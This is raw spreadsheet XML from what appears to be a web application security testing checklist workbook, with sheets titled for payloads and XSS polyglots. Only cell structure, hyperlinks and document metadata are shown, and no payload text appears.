    <hyperlink ref="F144" r:id="rId11" xr:uid="{A27B97F1-4E35-4ECF-98B0-C1FC61C29CE8}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="300" verticalDpi="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827FA-3EBB-4B2A-ABBC-9D75CC7CE738}">
  <dimension ref="A1:C30"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B7" sqref="B7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="37.6328125" customWidth="1"/>
    <col min="2" max="2" width="96.90625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="77.6328125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" s="5" customFormat="1" x14ac:dyDescent="0.35">
      <c r="A1" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>34</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="87" x14ac:dyDescent="0.35">
      <c r="A2" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B2" s="12" t="s">
        <v>36</v>
      </c>
      <c r="C2" s="5" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A3" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>262</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="29" x14ac:dyDescent="0.35">
      <c r="A4" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B4" s="12" t="s">
        <v>266</v>
      </c>
      <c r="C4" s="5" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A5" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B5" s="12" t="s">
        <v>268</v>
      </c>
      <c r="C5" s="5" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="58" x14ac:dyDescent="0.35">
      <c r="A6" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B6" s="12" t="s">
        <v>269</v>
      </c>
      <c r="C6" s="5" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A7" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B7" s="5" t="s">
        <v>238</v>
      </c>
      <c r="C7" s="5"/>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A8" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B8" s="5" t="s">
        <v>239</v>
      </c>
      <c r="C8" s="5"/>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A9" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B9" s="5" t="s">
        <v>241</v>
      </c>
      <c r="C9" s="5"/>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A10" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B10" s="5" t="s">
        <v>242</v>
      </c>
      <c r="C10" s="5"/>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A11" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B11" s="5" t="s">
        <v>243</v>
      </c>
      <c r="C11" s="5"/>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A12" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B12" s="5" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="5"/>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A13" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B13" s="5" t="s">
        <v>245</v>
      </c>
      <c r="C13" s="5"/>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A14" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B14" s="5" t="s">
        <v>246</v>
      </c>
      <c r="C14" s="5"/>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A15" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B15" s="5" t="s">
        <v>259</v>
      </c>
      <c r="C15" s="5"/>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A16" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B16" s="12" t="s">
        <v>261</v>
      </c>
      <c r="C16" s="5"/>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A17" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B17" s="5" t="s">
        <v>277</v>
      </c>
      <c r="C17" s="5"/>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A18" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>270</v>
      </c>
      <c r="C18" s="5"/>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A19" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>271</v>
      </c>
      <c r="C19" s="5"/>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A20" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>272</v>
      </c>
      <c r="C20" s="5" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A21" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>274</v>
      </c>
      <c r="C21" s="5" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A22" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B22" s="13" t="s">
        <v>276</v>
      </c>
      <c r="C22" s="5" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="14" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A23" s="5" t="s">
        <v>40</v>
      </c>
      <c r="B23" s="5" t="s">
        <v>42</v>
      </c>
      <c r="C23" s="5" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A24" s="5" t="s">
        <v>40</v>
      </c>
      <c r="B24" s="5" t="s">
        <v>43</v>
      </c>
      <c r="C24" s="5" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="25" spans="1:3" ht="145" x14ac:dyDescent="0.35">
      <c r="A25" s="5" t="s">
        <v>7</v>
      </c>
      <c r="B25" s="12" t="s">
        <v>129</v>
      </c>
      <c r="C25" s="5" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A26" s="5" t="s">
        <v>46</v>
      </c>
      <c r="B26" s="13" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="377" x14ac:dyDescent="0.35">
      <c r="A27" s="5" t="s">
        <v>11</v>
      </c>
      <c r="B27" s="11" t="s">
        <v>62</v>
      </c>
      <c r="C27" s="5" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="72.5" x14ac:dyDescent="0.35">
      <c r="A28" s="5" t="s">
        <v>53</v>
      </c>
      <c r="B28" s="11" t="s">
        <v>240</v>
      </c>
      <c r="C28" s="5" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A29" s="5" t="s">
        <v>60</v>
      </c>
      <c r="B29" s="11" t="s">
        <v>142</v>
      </c>
      <c r="C29" s="5" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="87" x14ac:dyDescent="0.35">
      <c r="A30" s="5" t="s">
        <v>80</v>
      </c>
      <c r="B30" s="11" t="s">
        <v>81</v>
      </c>
      <c r="C30" s="5" t="s">
        <v>82</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="B26" r:id="rId1" xr:uid="{BE7E9B46-E5B0-42F0-9D8B-0D2824876173}"/>
    <hyperlink ref="B18" r:id="rId2" xr:uid="{8A3B4C61-3AA8-4DDB-8E90-01B0A3CA7576}"/>
    <hyperlink ref="B19" r:id="rId3" xr:uid="{87087C52-35AC-4B43-A1D1-C537BFF2EF84}"/>
    <hyperlink ref="B20" r:id="rId4" xr:uid="{C39696B6-D4C0-48C0-8F57-877E05E24667}"/>
    <hyperlink ref="B21" r:id="rId5" xr:uid="{7D13D9DE-5677-47F8-A745-535D06A33EE2}"/>
    <hyperlink ref="B22" r:id="rId6" xr:uid="{5001A92C-DE0F-4D30-BB93-7FDA1F4E0EC3}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="30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8A84C-B86C-459F-BAF1-1392D96DB7DE}">
  <dimension ref="A1:A10"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="255.6328125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A1" s="46" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>249</v>
      </c>
    </row>
    <row r="3" spans="1:1" ht="29" x14ac:dyDescent="0.35">
      <c r="A3" s="48" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A4" s="47" t="s">
        <v>250</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A5" s="47" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A6" s="47" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A7" s="47" t="s">
        <v>253</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A8" s="47" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="9" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A9" s="47" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="10" spans="1:1" x14ac:dyDescent="0.35">
      <c r="A10" s="47" t="s">
        <v>256</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A1" location="'Web Application - Checklist'!A1" display="&lt;&lt;Back" xr:uid="{9E7CAAC3-8B9A-4092-B782-F9EF3416B023}"/>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ECBEC-A421-4FCE-B173-1821D08963D4}">
  <dimension ref="A1:B11"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B20" sqref="B20:B21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="16.6328125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="17.54296875" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" s="53" customFormat="1" x14ac:dyDescent="0.35">
      <c r="A1" s="53" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A2" s="46" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A3" s="44" t="s">
        <v>220</v>
      </c>
      <c r="B3" s="44" t="s">
        <v>221</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A4" s="4"/>
      <c r="B4" s="4"/>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A5" s="4" t="s">
        <v>222</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A6" s="4" t="s">
        <v>224</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A7" s="4" t="s">
        <v>226</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A8" s="4" t="s">
        <v>228</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A9" s="4" t="s">
        <v>231</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A10" s="4" t="s">
        <v>232</v>
      </c>
      <c r="B10" s="4"/>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A11" s="4" t="s">
        <v>233</v>
      </c>
      <c r="B11" s="4"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:XFD1"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="A2" location="'Web Application - Checklist'!A1" display="&lt;&lt;Back" xr:uid="{B50A4BA0-5040-4E57-AA32-5A399B5BDB48}"/>
  </hyperlink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A04AD7-AEE9-4DC0-ABFB-8711907F93E8}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/DataMashup"/>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54834</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="OptimizationTime">
    <vt:lpwstr>20220727_1829</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Application - Checklist</vt:lpstr>
      <vt:lpstr>Payloads</vt:lpstr>
      <vt:lpstr>XSS Polyglot Payloads</vt:lpstr>
      <vt:lpstr>DOM (Source - Sink)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Aju M Thomas</dc:creator>
  <cp:lastModifiedBy>Aju M Thomas</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-27T18:37:32Z</dcterms:modified>
</cp:coreProperties>
</file>